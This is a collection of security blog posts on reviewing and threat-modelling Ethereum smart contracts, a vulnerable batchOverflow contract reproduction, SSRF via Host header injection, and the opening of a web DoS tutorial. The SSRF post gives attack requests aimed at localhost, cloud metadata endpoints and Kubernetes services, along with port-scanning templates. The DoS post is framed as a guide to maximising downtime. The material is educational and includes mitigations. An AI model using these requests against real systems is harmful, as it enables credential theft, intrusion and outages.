16/03/2021

Ethereum Smart Contract Source Code Review

 Introduction 

As Crypto currency technologies are becoming more and more prevalent, as the time is passing by, and banks will soon start adopting them. Ethereum blockchain and other complex blockchain programs are relatively new and highly experimental. Therefore, we should expect constant changes in the security landscape, as new bugs and security risks are discovered, and new best practices are developed [1].This article is going to discuss how to perform a source code review in Ethereum Smart Contracts (SCs) and what to look for. More specifically we are going to focus in specific keywords and how to analyse them. 

The points analysed are going to be:
  • User supplied input filtering, when interacting directly with SC
  • Interfacing with external SCs
  • Interfacing with DApp applications
  • SC formal verification
  • Wallet authentication in DApp

SC Programming Mindset

When designing an SC ecosystem (a group of SCs, constitutes an ecosystem) is it wise to have some specific concepts and security design principles in mind. SC programming requires a different engineering mindset than we may be used to. The cost of failure can be high, and change can be difficult, making it in some ways more similar to hardware programming or financial services programming than web or mobile development. 

When programming SCs we should be able to:
  • Design carefully roll outs
  • Keep contracts simple and modular
  • Be fully aware of blockchain properties
  • Prepare for failure

Key Security Concepts For SCs Systems


More specifically it is mandatory and the responsible thing to  is to take into consideration the following areas:
  • SC ecosystem monitoring e.g. monitor for unusual transactions etc.
  • SC ecosystem governance/admin e.g. by using proxy SC that follow best practices etc.
  • SC formal verification of all the SCs interacting with
  • SC modular/clean coding e.g. use comments and modular code etc. 
  • SC ecosystem code auditing by an external independent 3rd party
  • SC ecosystem system penetration testing by an external independent 3rd party  
Note: At this point we should point out that it is important that DApp smart contract interaction should also be reviewed.

SCs User Input Validation

Make sure you apply user input validation on a DApp and SC level. Remember that on-chain data are public and an adversary can interact with a SC directly, by simply visiting an Ethereum explorer in etherscan.io, the following screenshots demonstrate that.

Below we can see an example of a deployed contract:



Simple by clicking in the SC link we can interact with the contract:



Note:  Above we can see the upgrade function call and various other Admin functions. Of course is not that easy to interact with them.

It is also known that etherscan.io provides some experimental features to decompile the SC code:


 If we click the decompile code we get this screen below:


Below we can see how a DApp or wallet can interact with a SC:



There are five categories of Ethereum wallets that can interact with DApps:
  • Browser built-in (e.g. Opera, Brave etc)
  • Browser extension (e.g. MetaMask )
  • Mobile wallets (e.g. Trust, Walleth, Pillar etc.)
  • Account-based web wallets (e.g. Fortmatic, 3box etc.)
  • Hardware wallets (e.g. Ledger, Trezor etc.)
Then there is a larger category of wallets that cannot integrate with DApps include generic wallet apps that lack the functionality to integrate with smart contracts. Different wallets have a different user experience to connect. For example, with MetaMask you get a Connect pop up. With mobile wallets, you scan a QR code. So phishing attacks take a different for e.g. an attacker can spoof a QR code, through online free QR generators etc. When assessing a DApp the architecture is of paramount importance. A user with a Metamask plugin can use it to connect to the DApp. The DApp automatically will associate the interaction with the user public key to run various tasks. 

For a Web based DApp we can use traditional filtering methods. But for SCs using Solidity we can use assert and require are as convenience functions that check for conditions (e.g. a user supplies input and the mentioned functions check if the conditions are met). In cases when conditions are not met, they throw exceptions, that we help us handle the errors.

These are the cases when Solidity creates assert-type of exceptions when we [3]:
  • Invoke Solidity assert with an argument, showing false.
  • Invoke a zero-initialized variable of an internal function type.
  • Convert a large or negative value to enum.
  • We divide or modulo by zero.
  • We access an array in an index that is too big or negative.
The require Solidity function guarantees validity of conditions that cannot be detected before execution. It checks inputs, contract state variables and return values from calls to external contracts.

In the following cases, Solidity triggers a require-type of exception when [3]:
  • We call require with arguments that result in false.
  • A function called through a message does not end properly.
  • We create a contract with new keyword and the process does not end properly.
  • We target a codeless contract with an external function.
  • We contract gets Ether through a public getter function.
  • We .transfer() ends in failure.
Generally speaking when handling complex user input and run mathematical calculations it is mandatory to use external libraries from 3rd partyaudited code. A code project to look into would be SafeMath from OpenZeppelin. SafeMath is a wrapper over Solidity’s arithmetic operations with added overflow checks. Arithmetic operations in Solidity wrap on overflow. This can easily result in bugs, because programmers usually assume that an overflow raises an error, which is the standard behavior in high level programming languages. SafeMath restores this intuition by reverting the transaction when an operation overflows.

SC External Calls


Calls to untrusted 3rd party Smart Contracts can introduce several security issues. External calls may execute malicious code in that contract or any other contract that it depends upon. As such, every external call should be treated as a potential security risk.  Solidity's call function is a low-level interface for sending a message to an SC. It returns false if the subcall encounters an exception, otherwise it returns true. There is no notion of a legal call, if it compiles, it's valid Solidity.


Especially when the return value of a message call is not checked, execution will resume even if the called contract throws an exception. If the call fails accidentally or an attacker forces the call to fail, this may cause unexpected behavior in the subsequent program logic. Always make sure to handle the possibility that the call will fail by checking the return value of that function [4].

Reentrancy (Recursive Call Attack)

One of the major risks of calling external contracts is that they can take over the control flow. In the reentrancy attack (a.k.a. recursive call attack) calling external contracts can take over the control flow, and make changes to your data that the calling function wasn’t expecting. A reentrancy attack occurs when the attacker drains funds from the target contract by recursively calling the target’s withdraw function [4].

Below we can see a schematic representation:




Note: For more information on this type of attack please see [4]

SC Denial of Service Attacks

Each block has an upper bound on the amount of gas that can be spent, and thus the amount computation that can be done. This is the Block Gas Limit. If the gas spent exceeds this limit, the transaction will fail. 

This leads to a couple possible Denial of Service vectors:
  • Gas Limit DoS on a Contract via Unbounded Operations
  • Gas Limit DoS on the Network via Block Stuffing
Note: For more information on DoS attacks see consensys.github.io

Use Of Delegatecall/Callcode and Libraries

According the Solidity docs [7], there exists a special variant of a message call, named delegatecall which is identical to a message call apart from the fact that the code at the target address is executed in the context of the calling contract and msg.sender and msg.value do not change their values.

This means that a contract can dynamically load code from a different address at runtime. Storage, current address and balance still refer to the calling contract, only the code is taken from the called address. This makes it possible to implement the “library” feature in Solidity: Reusable library code that can be applied to a contract’s storage, e.g. in order to implement a complex data structure.

Improper security use of this function was the cause for the Parity Multisig Wallet hack in 2017. This function is very useful for granting our contract the ability to make calls on other contracts, as if that code were a part of our own contract. However, using delegatecall() causes all public functions from the called contract to be callable by anyone. Because this behavior was not recognized when Parity built its own custom libraries. 

Epilogue 

Writing secure smart code is a lot of work and can be very complex.

References:


15/03/2021

Elusive Thoughts celebrates 9 years of blogging about hacking

 Elusive Thoughts celebrates 9 years of blogging about hacking 

Elusive Thoughts just created its first non-fungible token (NFT), a digital file whose unique identity and ownership are verified on a blockchain (a digital ledger). 


There is a hidden secret in my NFT, please find it.


Buy my NFT at rarible.com

 

14/02/2021

Threat Modeling Smart Contract Applications

INTRODUCTION 

Ethereum Smart Contracts and other complex blockchain programs are new, promising and highly experimental. Therefore, we should expect constant changes in the security landscape, as new bugs and security risks are discovered, and new best practices are developed [1]. 

This article is going to focus on threat modeling of smart contract applications. Threat modelling is a process by which threats, such as absence of appropriate safeguards, can be identified, enumerated, and mitigation can be prioritized accordingly. The purpose of threat model is to provide contract applications defenders with a systematic analysis of what controls or defenses need to be included, given the nature of the system, the probable attacker's profile, the most likely attack vectors, and the assets most desired by an attacker. 

Smart contract programming requires a different engineering mindset than we may be used to. The cost of failure can be high, and change can be difficult, making it in some ways more similar to hardware programming or financial services programming than web or mobile development. 

FORMAL VERIFICATION AND SMART CONTRACTS

At this point we should make clear that besides threat modeling, or as part of the threat modeling process, formal verification should also be mandatory. Formal verification is the act of proving or disproving the correctness of intended algorithms underlying a system with respect to a certain formal specification or property, using formal methods of mathematics. In a few words is crucial for the code to do what is supposed to do [2].

A very good project example, as far as formal verification is concerned is the Cardano cryptocurrency technology. Cardano is developing a technology using a provably correct security model that it provides a guaranteed limit of adversarial power [3]. Also Cardano is using Haskell as a programming language, which is a language that facilitates formal verification.

SMART CONTRACT ASSETS

In order to continue analyzing the information from the Smart Contract ecosystem will define what are assets in the context of this Smart Contract Applications. 

Assets are:
  • The Smart Contract function we require to protect. 
  • The Smart Contract data we require to protect.

THREAT ACTORS

This section is going to focus on the threat actors of the smart contract applications. A threat actor or malicious actor is a person or entity responsible for an event or incident that impacts, the safety or security of smart contract applications. In the context if this article, the term is used to describe individuals and groups that perform malicious acts. 

More specifically we are going to reference the following actors:
  • Nation State Actor with unlimited resources 
  • Organized Crime Actor with significant resources 
  • Insiders Actor with extensive knowledge of the system 
  • Hacktivists Actor with ideology as a motive and limited resources
  • Script Kiddies with limited knowledge of the technology and very few resources
  • Others Actors, such as accidental attacks
Note: From a threat intelligence perspective, threat actors are often categorized as either unintentional or intentional and either external or internal. Also threat agents should be primarily based on access e.g. external or internal actors etc. The likelihood of the threat is closely related to the attacker motive e.g. Nation state attacker has high level of motivation and Script Kiddies low level of motivation and therefor low likelihood. 

SMART CONTRACT THREAT ACTORS

In this section we are going to discuss the threat actors that are related only to Smart Contract Applications. Each technology has its own peculiarities, and blockhain technologies have their own. 

The actors that are related to Smart Contracts are two types:
  • Malicious Smart Contracts 
  • Humans interacting with Smart Contracts through DApps or directly.
Smart contracts can call functions of other contracts and are even able create and deploy other contracts (e.g. issuing coins). There are several use-cases for this behavior. 

A few use cases of interacting with other contracts are described below:
  • Use contracts as data stores
  • Use other contracts as libraries
In the context of this article an Actor interacting with a Smart Contract outside the blockchain is en external Actor and an Actor interacting with a smart contract inside the blockchain is an internal Actor. 

COMMON SMART CONTRACT ATTACKS

The following is a list of known attacks which we should be aware of, and defend against when writing smart contracts [4]. 
  • Reentrancy
    • Reentrancy on a Single Function
    • Cross-function Reentrancy
  • Timestamp Dependence
  • Integer Overflow and Underflow
  • DoS with (Unexpected) revert
  • DoS with Block Gas Limit
  • Gas Limit DoS on the Network via Block Stuffing
  • Insufficient gas griefing
  • Forcibly Sending Ether to a Contract
We are not going to explain each attack here. For more information please see the link [4].

ATTACK TREES

This section is going to focus the attack trees of the contract applications. Attack Trees provide a formal, methodical way of describing the security of systems, based on varying attacks. A tree structure is used represent attacks against a system, with the goal as the root node and different ways of achieving that goal as leaf nodes. 

The attack attributes assist in associating risk with an attack. An Attack Tree can include special knowledge or equipment that is needed, the time required to complete a step, and the physical and legal risks assumed by the attacker. The values in the Attack Tree could also be operational or development expenses. An Attack Tree supports design and requirement decisions. If an attack costs the perpetrator more than the benefit, that attack will most likely not occur. However, if there are easy attacks that may result in benefit, then those need a defense.

Below we can see a typical client browser attack tree:



ABUSE CASE DIAGRAMS

The relationships between the work products of a security engineering process can be hard to understand, even for persons with a strong technical background but little knowledge of security engineering. Market forces are driving software practitioners who are not security specialists to develop software that requires security features. When these practitioners develop software solutions without appropriate security-specific processes and models, they sometimes fail to produce effective solutions. Same thing happens with Smart Contract development, that is why abuse case diagrams should be used to model the security requirements of Smart Contract applications.

We will define an abuse case as a specification of a type of complete interaction between a system and one or more actors, where the results of the interaction are harmful to the system, one of the actors, or one of the stakeholders in the system.

Below we can see a simple use case diagram:


Below we can see a simple abuse case diagram with an external actor:



In the diagram above an external bad actor is manipulating the login function externally. This is a typical client browser attack e.g. the DApp application has an stored XSS and the attacker install a fake login page or the DApp does not handle correctly users private key etc. 

Below we can see another  simple abuse case diagram with an external actor:


Again in the diagram above an external bad actor is manipulating the the approve function externally. This is a typical client browser attack e.g. the DApp application has CSRF and the attacker exploits the vulnerability through a phishing attack etc. 

Below we can see a simple abuse case diagram with an internal actor:


Again in the diagram above an internal bad actor, this time, is manipulating the the approve function internally. This is an attack conducted internally from a malicious contract e.g. running a Reentrancy attack using the callback function e.t.c.

LAST WORDS

Before releasing any Smart Contract system make sure the system is pen-tested and the code is reviewed and there is in place a formal verification of the contract.

For code reviews make sure to:
  • Use a consistent code style
  • Avoid leaving commented code
  • Avoid unused code and unnecessary inheritance 
  • Use a fixed version of the Solidity compiler 
  • Analysis of GAS usage 
For pen-test make sure to:
  • Run a normal Web App pen-test for the web component of the DApp
  • Check how the DApp is interacting with the Smart Contract
Logical flow to follow would be:



TOOLS TO USE

Below there is a list of tools we can utilize to test our Smart Contract system:
  • Mythril :- Mythril is a security analysis tool for EVM bytecode. It detects security vulnerabilities in smart contracts built for Ethereum, Hedera, Quorum, Vechain, Roostock, Tron and other EVM-compatible blockchains.
  • Solhint :- Solhint is an open source project for linting Solidity code. This project provides both Security and Style Guide validations.
References: 


06/02/2021

Get Rich Or Die Trying

Introduction



This article is going to focus on "Programmable Money Overflow Attacks" on Ethereum and this is the way hackers can become rich and famous. More specifically we are going to discuss the batchOverflow attack. The batchOverflow Bug was identified in multiple ERC20 Smart Contracts [3] (CVE-2018–10299), back in 2018, when Ethereum was relatively new. [1]  

The batchOverflow attack is a typical integer overflow attack in the batchTransfer function of a smart contract implementation for the Beauty Ecosystem Coin (BEC). The BEC was an Ethereum ERC20 compliant token that allowed attackers to accomplish an unauthorized increase of digital assets by providing two _receivers arguments in conjunction with a large _value argument, as exploited in the wild in April 2018 [2]. But before we move into replicating the attack, it is better if we explain a few Blockchain properties.

The Code Is Law Principle  

The "code is law principle" is the principle that no one has the right to censor the execution of code on the ETH blockchain. In layman's terms this means that as soon as a smart contract is deployed on the ETH blockchain, then the code cannot change. One of the main defining properties of Ethereum Smart Contracts is that their code is immutable. Blockchain immutability means that all the engaging parties agree to the terms or “code” of the Smart Contract, that code can’t be changed by any party unilaterally [4]. And this is the main reason a Smart Contract gets trustworthy.


Well that is not exactly true, a contract, can be a) destroyed or get b) upgraded. Which essentially means that the code:
  • In the first scenario will stop functioning, but wont get deleted (because a blockchain is immutable)
  • In the second scenario the smart contract will get:
    • Upgraded and modify their code, while not preserving their address, state, and balance.
    • Upgraded and modify their code, while preserving their address, state, and balance, by using special tools (e.g. by using tools such as OpenZeppelin Upgrades Plugins, or proxy smart contracts) [7].
Below we can see an Ethereum blockchain [6]:


When the contract is destroyed the state root of the block account is zeroed. Each block has a "state root" which contains accounts. With a Self-destruct function the opcode triggered is used to zero out the block account of the smart contract. The Bitcoin ledger is based on recording transactions and the Ethereum blockchain is based on managing account balances. Why am I giving you all this information? Well, to put it simple, to explain that deleting or upgrading a Smart Contract is not an easy job. And guess what, in order to install a security patch to a smart contract we need either to destroy the old smart contract and create a new one or upgrade the current smart contract. This essentially means that Smart Contract governance is important. In the early stages of the cryptocurrency space, such governance was not something that was carefully designed.

The Money Overflow

Below we can see some vulnerable code for explaining the actual vulnerability. In the following code we are replicating the behavior and the insufficient user input validation code. 

pragma solidity ^0.4.10;

contract TheOverflow {
     
    mapping (address => uint) contractBalances;
  
    function contribute() payable { 
        contractBalances[msg.sender] = msg.value;
    }
  
    function getBalance() constant returns (uint) {
        return contractBalances[msg.sender]; 
    }
    
    function batchTransfer(address[] _receivers, uint _value) { 
    // This is the infamous batchTransfer vulnerable function
    // Overflow line, that caused the hack
        uint totalReceivers = _receivers.length * _value;
        
        require(contractBalances[msg.sender] >= totalReceivers); // Here is the user input validation
        contractBalances[msg.sender] = contractBalances[msg.sender] -totalReceivers;
        
        for(uint counter=0; counter< _receivers.length; counter++) { // Here is the function loop
            contractBalances[_receivers[counter]] = contractBalances[_receivers[counter]] + _value;
        }  
    }
}

The ways the batchTransfer function works is that it accepts as input the receivers addresses and the value to transfer e.g., it will get as an input a list with three or more addresses, along with the value of the ETH to transfer. Then it will get the number of the receivers and check against each receiver the balance e.g. see if the address that withdraws ETH has enough.

The vulnerable function batchTransfer shown in the code above: 
  1. The variable _value accepts the amount to be transferred as a user input (declared as 256 bits integer).
  2. The variable _value was overflowed with zeros and got zeroed out.
  3. When the variable _value is zeroed out the require checks got bypassed.
  4. The require check then became - 0>=0, which is a true condition.

What Is An ERC20 Token And Why Is Relevant

ERC-20 has emerged as a Smart Contract de-facto technical standard; it is used for all Smart Contracts on the Ethereum blockchain for token implementation and provides a list of rules that all Ethereum-based tokens must follow [9]. This means that in order for a token to run on the Ethereum, it has to implement certain functionality, or more specifically an interface. 

As of October 2019, more than 200,000 ERC-20-compatible tokens exist on Ethereum's main network. The ERC-20 defines a common list of rules that all Ethereum tokens must adhere to. Some of these rules include how the tokens can be transferred, how transactions are approved, how users can access data about a token, and the total supply of tokens [9]. Consequently, this particular token empowers developers of all types to accurately predict how new tokens will function within the larger Ethereum system. The same applies also for attackers, a hacker understands that all ERC20 tokens, must implement certain functionality, in order to interface with the Ethereum blockchain. But the implementation details of these functions is going to be handled by the developer, not the standard.  

 How Did exchanges React To The Hack?

Due to lack of coordination between Centralized Exchanges (CEX) and Decentralized Exchanges (DEX) no immediate response took place. This resulted into hacking attacks taking place for a long period of time, even when the hack does not go unnoticed. An extra layer of security must be added that monitors the Smart Contract behavior and takes action accordingly. For example in our attack scenario the suspicious transaction should have been blocked due to excessive withdraw of funds. 

The Impact

The bug was discovered 04/22/2018. The weakness was released 04/23/2018 (Website). The advisory is shared at dasp.co. This vulnerability is uniquely identified as CVE-2018-10299 since 04/22/2018. It is possible to initiate the attack remotely. No form of authentication is needed for exploitation. It demands that the victim is doing some kind of user interaction. Technical details are known, but no exploit is available. The price for an exploit might be around USD $5k-$25k at the moment (estimation calculated on 01/30/2020) [8].

References:
































22/02/2020

SSRFing External Service Interaction and Out of Band Resource Load (Hacker's Edition)

External Service Interaction & Out-of-Band Resource Loads — Updated 2026

External Service Interaction & Out-of-Band Resource Loads

Host Header Exploitation // SSRF Primitives // Infrastructure Pivoting
SSRF Host Header Injection CWE-918 OWASP A10:2021 Cache Poisoning Updated 2026

In the recent past we encountered two relatively new types of attacks: External Service Interaction (ESI) and Out-of-Band Resource Loads (OfBRL).

  1. An ESI [1] occurs only when a web application allows interaction with an arbitrary external service.
  2. OfBRL [6] arises when it is possible to induce an application to fetch content from an arbitrary external location, and incorporate that content into the application's own response(s).
Taxonomy Note (2026): Both ESI and OfBRL are now classified under OWASP A10:2021 — SSRF and map to CWE-918 (Server-Side Request Forgery). ESI also maps to CWE-441 (Unintentional Proxy or Intermediary).

The Problem with OfBRL

The ability to request and retrieve web content from other systems can allow the application server to be used as a two-way attack proxy (when OfBRL is applicable) or a one-way proxy (when ESI is applicable). By submitting suitable payloads, an attacker can cause the application server to attack, or retrieve content from, other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.

The Problem with ESI

External service interaction arises when it is possible to induce an application to interact with an arbitrary external service, such as a web or mail server. The ability to trigger arbitrary external service interactions does not constitute a vulnerability in its own right, and in some cases might even be the intended behavior of the application. However, in many cases, it can indicate a vulnerability with serious consequences.

Attacker Host: malicious.com Vulnerable application Trusts Host header blindly ESI path OfBRL path External service DNS / HTTP interaction External resource Content fetched + returned One-way proxy No content returned Two-way proxy Content in app response CWE-918 / CWE-441 CWE-918 / A10:2021
Figure 1 — ESI (one-way) vs OfBRL (two-way) attack paths

The Verification

We do not have ESI or OfBRL when:

  1. In Collaborator, the source IP is our browser IP (the server didn't make the request).
  2. There is a 302 redirect from our host to the Collaborator (i.e. our source IP appears in the Collaborator logs, not the server's).

Below we can see the original configuration in the repeater, followed by the modified configuration for the test. In the original request, the Host header reflects the legitimate domain. In the test request, we replace it with our Collaborator payload or target host.

Original request

GET / HTTP/1.1 Host: our_vulnerableapp.com Pragma: no-cache Cache-Control: no-cache, no-transform Connection: close

Malicious requests

GET / HTTP/1.1 Host: malicious.com Pragma: no-cache Cache-Control: no-cache, no-transform Connection: close
GET / HTTP/1.1 Host: 127.0.0.1:8080 Pragma: no-cache Cache-Control: no-cache, no-transform Connection: close

If the application is vulnerable to OfBRL, the reply is going to be processed by the vulnerable application, bounce back to the sender (the attacker) and potentially load in the context of the application. If the reply does not come back to the sender, then we might have an ESI, and further investigation is required.

The RFCs Updated

It usually is a platform issue and not an application one. In some scenarios when we have, for example, a CGI application, the HTTP headers are handled by the application (i.e. the app is dynamically manipulating the HTTP headers to run properly). This means that HTTP headers such as Location and Host are handled by the app and therefore a vulnerability might exist. It is recommended to run HTTP header integrity checks when you own a critical application that is running on your behalf.

For more information on the subject, read RFC 9110 (HTTP Semantics, June 2022) [2] and RFC 9112 (HTTP/1.1 Message Syntax and Routing) [2b], which supersede the obsolete RFC 2616. The Host request-header field specifies the Internet host and port number of the resource being requested, as obtained from the original URI. The Host field value MUST represent the naming authority of the origin server or gateway given by the original URL. This allows the origin server or gateway to differentiate between internally-ambiguous URLs, such as the root "/" URL of a server for multiple host names on a single IP address.

RFC Update: RFC 2616 was obsoleted in 2014 by RFCs 7230–7235, which were themselves superseded by RFCs 9110–9112 in June 2022. All references in this article now point to the current standards.

When TLS is enforced throughout the whole application (even the root path /), an ESI or OfBRL is significantly harder to exploit, because TLS performs source origin authentication — as soon as a connection is established with an IP, the protocol guarantees that the connection will serve traffic only from the original certificate holder. More specifically, we are going to get an SNI error.

SNI prevents what's known as a "common name mismatch error": when a client device reaches the IP address of a vulnerable app, but the name on the TLS certificate doesn't match the name of the website. SNI was added to the IETF's Internet RFCs in June 2003 through RFC 3546, with the latest version in RFC 6066. The current TLS 1.3 specification is RFC 8446 [10].

ECH Warning (2025+): Encrypted Client Hello (ECH), specified in RFC 8744 and actively being deployed by major browsers and CDNs, encrypts the SNI field within the TLS handshake. This means that SNI-based filtering and inspection at network perimeters becomes ineffective when ECH is in use. Security teams should account for this when relying on SNI as a defensive control.
Attacker Host: evil.com TLS ClientHello SNI: evil.com TLS termination Cert: vulnapp.com SNI mismatch check evil.com ≠ vulnapp.com Connection refused (SNI error) Note: ECH (RFC 8744) encrypts SNI — changes this model
Figure 2 — TLS/SNI protection mechanism (and its ECH caveat)

The option to trigger an arbitrary external service interaction does not constitute a vulnerability in its own right, and in some cases it might be the intended behavior of the application. But we as hackers want to exploit it — what can we do with an ESI or an Out-of-Band Resource Load?

The Infrastructure

Well, it depends on the overall setup. The highest-value scenarios are the following:

  1. The application is behind a WAF (with restrictive ACLs)
  2. The application is behind a UTM (with restrictive ACLs)
  3. The application is running multiple applications in a virtual environment
  4. The application is running behind a NAT
  5. The application runs in a cloud environment with metadata endpoints accessible from localhost
  6. The application runs in a containerized environment (Docker/Kubernetes) with internal service discovery

In order to perform the attack, we simply inject our host value in the HTTP Host header (hostname including port).

Attacker Host: 127.0.0.1:8080 WAF / UTM / load balancer Passes request (Host trusted) DMZ / internal network Vulnerable app server Processes injected Host localhost 127.0.0.1:* Admin panels Internal mgmt UIs DMZ hosts 192.168.x.x Cloud metadata 169.254.169.254 Container services K8s API / sidecars Trusted IP = app server IP → bypasses ACLs, firewalls, network segmentation
Figure 3 — Host header injection pivoting through infrastructure (including cloud/container targets)

The Test

Burp Professional edition has a feature named Collaborator. Burp Collaborator is a network service that Burp Suite uses to help discover vulnerabilities such as ESI and OfBRL [3]. A typical example would be to use Burp Collaborator to test if ESI exists.

Burp Collaborator request

GET / HTTP/1.1 Host: edgfsdg2zjqjx5dwcbnngxm62pwykabg24r.burpcollaborator.net Pragma: no-cache Cache-Control: no-cache, no-transform Connection: keep-alive

Burp Collaborator response

HTTP/1.1 200 OK Server: Burp Collaborator https://burpcollaborator.net/ X-Collaborator-Version: 4 Content-Type: text/html Content-Length: 53 <html><body>drjsze8jr734dsxgsdfl2y18bm1g4zjjgz</body></html>

The Post Exploitation

As hacker-artists, we now think about how to exploit this. The scenarios are: [7] [8]

  1. Attempt to load the local admin panels.
  2. Attempt to load the admin panels of surrounding applications.
  3. Attempt to interact with other services in the DMZ.
  4. Attempt to port scan localhost.
  5. Attempt to port scan DMZ hosts.
  6. Use it to exploit IP trust and run a DoS attack against other systems.
  7. Access cloud metadata endpoints to extract IAM credentials or instance identity tokens.
  8. Probe Kubernetes API or container sidecar services (e.g. Envoy admin on localhost:15000).

A good tool for automating this is Burp Intruder [4]. Using Sniper mode, we can:

  1. Rotate through different ports, using the vulnapp.com domain name.
  2. Rotate through different ports, using the vulnapp.com external IP.
  3. Rotate through different ports, using the vulnapp.com internal IP, if applicable.
  4. Rotate through different internal IPs in the same domain, if applicable.
  5. Rotate through different protocols (may not always work).
  6. Brute-force directories on identified DMZ hosts.

Burp Intruder — scanning surrounding hosts

GET / HTTP/1.1 Host: 192.168.1.§§ Pragma: no-cache Cache-Control: no-cache, no-transform Connection: close

Burp Intruder — port scanning surrounding hosts

GET / HTTP/1.1 Host: 192.168.1.1:§§ Pragma: no-cache Cache-Control: no-cache, no-transform Connection: close

Burp Intruder — port scanning localhost

GET / HTTP/1.1 Host: 127.0.0.1:§§ Pragma: no-cache Cache-Control: no-cache, no-transform Connection: close

Modern Attack Vectors New 2026

Since the original publication of this article, several high-impact attack surfaces have emerged that directly exploit ESI/OfBRL primitives:

Cloud metadata endpoint exploitation

Cloud providers expose instance metadata via link-local addresses. When a vulnerable application can be coerced into making requests to these endpoints via Host header injection, an attacker can extract IAM credentials, service account tokens, instance identity documents, and network configuration details.

GET / HTTP/1.1 Host: 169.254.169.254 # AWS IMDSv1 — returns IAM role credentials GET / HTTP/1.1 Host: metadata.google.internal # GCP — returns service account tokens GET / HTTP/1.1 Host: 169.254.169.254 Metadata: true # Azure — requires Metadata header (may not work via Host injection alone)
Mitigation: AWS IMDSv2 mitigates this by requiring a PUT request with a TTL-bounded token (hop limit = 1). GCP Compute VMs support a similar metadata concealment mechanism. Ensure your cloud instances enforce these protections.

Container and Kubernetes exploitation

In containerized environments, the application server often has network access to internal Kubernetes services that are never meant to be internet-facing:

GET / HTTP/1.1 Host: kubernetes.default.svc:443 # K8s API server — may leak secrets, pod specs, RBAC config GET / HTTP/1.1 Host: 127.0.0.1:15000 # Envoy sidecar admin — config dump, cluster endpoints, stats GET / HTTP/1.1 Host: 127.0.0.1:9090 # Prometheus metrics — may expose internal service topology

Practical cache poisoning (Kettle, 2018)

James Kettle's 2018 PortSwigger research on practical web cache poisoning significantly expanded the attack surface understanding for Host header injection. His work demonstrated that unkeyed HTTP headers (including Host, X-Forwarded-Host, and X-Forwarded-Scheme) can be used to poison shared caches (CDNs, reverse proxies) at scale, affecting all users served by the poisoned cache entry. This research formalized the technique that was previously theoretical into a repeatable, high-impact attack chain.

Step 1: Attacker poisons Attacker Host: evil.com Vulnerable app Response Links rewritten to evil.com Step 2: Cache stores poisoned response Shared cache / CDN / proxy Cached: / → poisoned response Step 3: Legitimate users get poisoned content User A User B User C All users served poisoned content Until cache TTL expires or entry is manually purged
Figure 4 — Cache poisoning via Host header injection

What Can You Do

The full exploitation analysis — this vulnerability can be used in the following ways:

  1. Bypass restrictive UTM ACLs
  2. Bypass restrictive WAF rules
  3. Bypass restrictive firewall ACLs
  4. Perform cache poisoning
  5. Fingerprint internal infrastructure
  6. Perform DoS exploiting IP trust
  7. Exploit applications hosted on the same machine (multiple app loads)
  8. Extract cloud IAM credentials via metadata endpoints
  9. Map Kubernetes cluster topology via internal service discovery
  10. Exfiltrate data through DNS-based out-of-band channels

The impact of a maliciously constructed response can be magnified if it is cached either by a shared web cache or the browser cache of a single user. If a response is cached in a shared web cache, such as those commonly found in proxy servers or CDNs, then all users of that cache will continue to receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, that user will continue to receive the malicious content until the cache entry expires [5].

What Can't You Do

You cannot perform XSS or CSRF exploiting this vulnerability, unless certain conditions apply (e.g. the poisoned response injects attacker-controlled JavaScript into a cached page, or the application reflects the Host header value into HTML output without encoding).

The Fix Updated

If the ability to trigger arbitrary ESI or OfBRL is not intended behavior, then you should implement a whitelist of permitted URLs, and block requests to URLs that do not appear on this whitelist [6]. Running host integrity checks is also recommended.

Review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary external service interactions is intended behavior. If so, be aware of the types of attacks that can be performed via this behavior and take appropriate measures. These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter.

More specifically, we can:

  1. Apply egress filtering on the DMZ
  2. Apply egress filtering on the host (iptables/nftables rules, or cloud security group outbound rules)
  3. Apply whitelist IP restrictions in the application
  4. Apply blacklist restrictions in the application (not recommended — incomplete by nature)
  5. Validate and normalize the Host header at the reverse proxy layer before it reaches the application (e.g. Nginx server_name directive with explicit hostnames, reject requests with unknown Host values)
  6. Use X-Forwarded-Host with strict allowlisting rather than trusting the raw Host header — and ensure the reverse proxy strips any client-supplied X-Forwarded-* headers before adding its own
  7. Enforce IMDSv2 on cloud instances (hop limit = 1, PUT-based token acquisition) to block Host header SSRF to metadata endpoints
  8. Apply Kubernetes NetworkPolicies to restrict pod-to-pod and pod-to-service communication to only what's necessary
  9. Deploy egress proxies for any application that legitimately needs to make outbound HTTP requests — force all outbound traffic through a proxy with domain allowlisting

23/07/2019

Web DDoSPedia a million requests


Web Application Denial of Service Next Level

In this tutorial we are going to talk on how to cause maximum down time (including operational recovery processes) in anything that uses the word Web, this is also known as a Denial o Service Attack. Using this knowledge for malicious purposes is not something I am recommending or approve and I have zero accountability on how you use this knowledge. This is the reason I am providing also with countermeasures on the end of the post.      

What Is The Landscape

In the past we have seen many Denial of Service attacks, but most of them were not very sophisticated. A very good example would be the Low Orbit Ion Cannon (LOIC). LOIC performs a DoS attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.[2]

All these attacks as stated in previous post do not really take advantage of the 7th layer complexity of the Web and therefore are not so effective as they could be. A very good post exists in the Cloudflare  blog named Famous DDoS Attacks [3].  

A few of the famous attacks are:
  • The 2016 Dyn attack
  • The 2015 GitHub attack
  • The 2013 Spamhaus attack
  • The 2000 Mafiaboy attack
  • The 2007 Estonia attack
Improving DoS and DDoS attacks

In order to improve or understand better what is possible while conducting a DoS attack, we have to think like a Web Server, Be a Web Server, Breath like a Web Server!!


Well what does a server breath? But of course HTTP, so what if we make the Web Server start breathing a lot of HTTP/S, that would be amazing.

This is how we can over dose with HTTP a web server:
  1. HTTP Connection reuse
  2. HTTP Pipelining
  3. Single SSL/TLS handshake  
But lets go a step further and expand on that, what else can we do to increase the impact? But of course profile the server and adjust the traffic to something that can be processed e.g. abuse vulnerable file upload functionality, SQLi attacks with drop statements etc.   


 HTTP connection reuse

HTTP persistent connection, also called HTTP keep-alive, or HTTP connection reuse, is the idea of using a single TCP connection to send and receive multiple HTTP requests/responses, as opposed to opening a new connection for every single request/response pair.

